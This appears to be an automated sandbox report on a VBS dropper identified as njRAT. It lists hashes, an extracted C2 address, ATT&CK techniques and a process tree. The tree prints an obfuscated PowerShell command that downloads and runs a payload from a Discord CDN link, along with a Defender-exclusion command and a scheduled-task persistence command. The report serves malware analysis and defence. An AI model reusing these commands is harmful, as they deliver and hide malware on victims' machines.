Overview

overview

10

Static

static

Shipment#4...45.vbs

windows7_x64

10

Shipment#4...45.vbs

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29-10-2021 17:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Shipment#45523666245.vbs

  • Size

    15KB

  • MD5

    b671f9ee1edb1e6f2911c22c4e6ebbaf

  • SHA1

    6de6dfee5b87a8f52ce34bc0c9d147bc69faa04e

  • SHA256

    313bb9d87b5bbdc4cc164ee429b41bcac1605401e1c3e7fa8d1fa287277e3cce

  • SHA512

    15f4ed29c203cf9a2da50b5df6d898e79feb08cf9ddc0ab7c315eeab9038745743e5352dc2db5197c3bf3817d26590bf4adc21a91a68fd2dcd633e3712fa4832

Score
10/10
njrat------(meilller)------trojan

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

------(MEILLLER)------

C2

new.libya2020.com.ly:2020

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Shipment#45523666245.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3524
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/903219380505169933/903220062633209916/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Users\Public\update.exe
        "C:\Users\Public\update.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\update.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1992
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrAhvaHxqGKf" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC37B.tmp"
          4⤵
          • Creates scheduled task(s)
          PID:2232
        • C:\Users\Public\update.exe
          "C:\Users\Public\update.exe"
          4⤵
          • Executes dropped EXE
          PID:2404
        • C:\Users\Public\update.exe
          "C:\Users\Public\update.exe"
          4⤵
          • Executes dropped EXE
          • Drops startup file
          PID:2388
  • C:\Users\Public\update.exe
    C:\Users\Public\update.exe
    1⤵
    • Executes dropped EXE
    PID:2236

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\update.exe.log
    MD5

    0c2899d7c6746f42d5bbe088c777f94c

    SHA1

    622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

    SHA256

    5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

    SHA512

    ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    2a1d2cf1d682a505378ba830b315e56e

    SHA1

    9fbfcc38a3462950c407e8b8b47d0b53a4cdd2c5

    SHA256

    2325fb2f644988e3ab5a34aadadf6b50567a947518f3ac1226fc5b96f0a9dbde

    SHA512

    42b7b2c48527d36bc3b362de5d934d66d07ffec29cea747d53307189371d249717b05d2d3e5cf7e085f5dcda1ab520209c8ed4822b908204b997123cbc7624e4

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • C:\Users\Public\update.exe
    MD5

    7059d3f5185128394432baaaa44ee4ea

    SHA1

    462dbc0838cb721cfb99ce505a30b0c32237e5ba

    SHA256

    cb12e8f994044454d20ef2effd5d91d9573f1c5b6230b87df75f51bd4921878a

    SHA512

    d7ddd0b4c0b72581c1e52f309eaa1f48834caa27bb43ec5b0f47b9e37085244c7e250e6eb46faeee249e02b0a5bb1a2c0c05e1c9eb6ee69bd5cd9ef3e3153ff5

    Download Submit
  • memory/1408-167-0x0000000007220000-0x000000000771E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/1408-157-0x0000000000000000-mapping.dmp
    Download
  • memory/1408-166-0x0000000009830000-0x0000000009836000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1408-165-0x00000000072A0000-0x00000000072A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-164-0x00000000072C0000-0x00000000072C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-163-0x0000000007720000-0x0000000007721000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-161-0x0000000000520000-0x0000000000521000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-168-0x0000000009A20000-0x0000000009A21000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1408-169-0x00000000099B0000-0x00000000099D8000-memory.dmp
    Filesize

    160KB

    Download
  • memory/1992-185-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-190-0x0000000008070000-0x0000000008071000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-186-0x0000000007F40000-0x0000000007F41000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-179-0x0000000007190000-0x0000000007191000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-283-0x0000000003503000-0x0000000003504000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-282-0x000000007EEE0000-0x000000007EEE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-195-0x00000000034B0000-0x00000000034B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-194-0x00000000088A0000-0x00000000088A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-192-0x0000000003500000-0x0000000003501000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-193-0x0000000003502000-0x0000000003503000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-191-0x0000000008B30000-0x0000000008B31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-181-0x0000000007800000-0x0000000007801000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-170-0x0000000000000000-mapping.dmp
    Download
  • memory/1992-187-0x0000000008090000-0x0000000008091000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-172-0x00000000034B0000-0x00000000034B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-188-0x0000000008210000-0x0000000008211000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1992-173-0x00000000034B0000-0x00000000034B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2232-171-0x0000000000000000-mapping.dmp
    Download
  • memory/2236-441-0x0000000007560000-0x0000000007A5E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/2388-175-0x0000000000400000-0x000000000040E000-memory.dmp
    Filesize

    56KB

    Download
  • memory/2388-176-0x00000000004083AE-mapping.dmp
    Download
  • memory/2388-431-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3636-122-0x00000290671B3000-0x00000290671B5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-115-0x0000000000000000-mapping.dmp
    Download
  • memory/3636-118-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-119-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-120-0x0000029067150000-0x0000029067151000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3636-116-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-121-0x00000290671B0000-0x00000290671B2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-148-0x00000290671B8000-0x00000290671BA000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-123-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-124-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-125-0x0000029067440000-0x0000029067441000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3636-126-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-130-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-131-0x00000290671B6000-0x00000290671B8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-132-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-117-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3636-159-0x000002904D270000-0x000002904D272000-memory.dmp
    Filesize

    8KB

    Download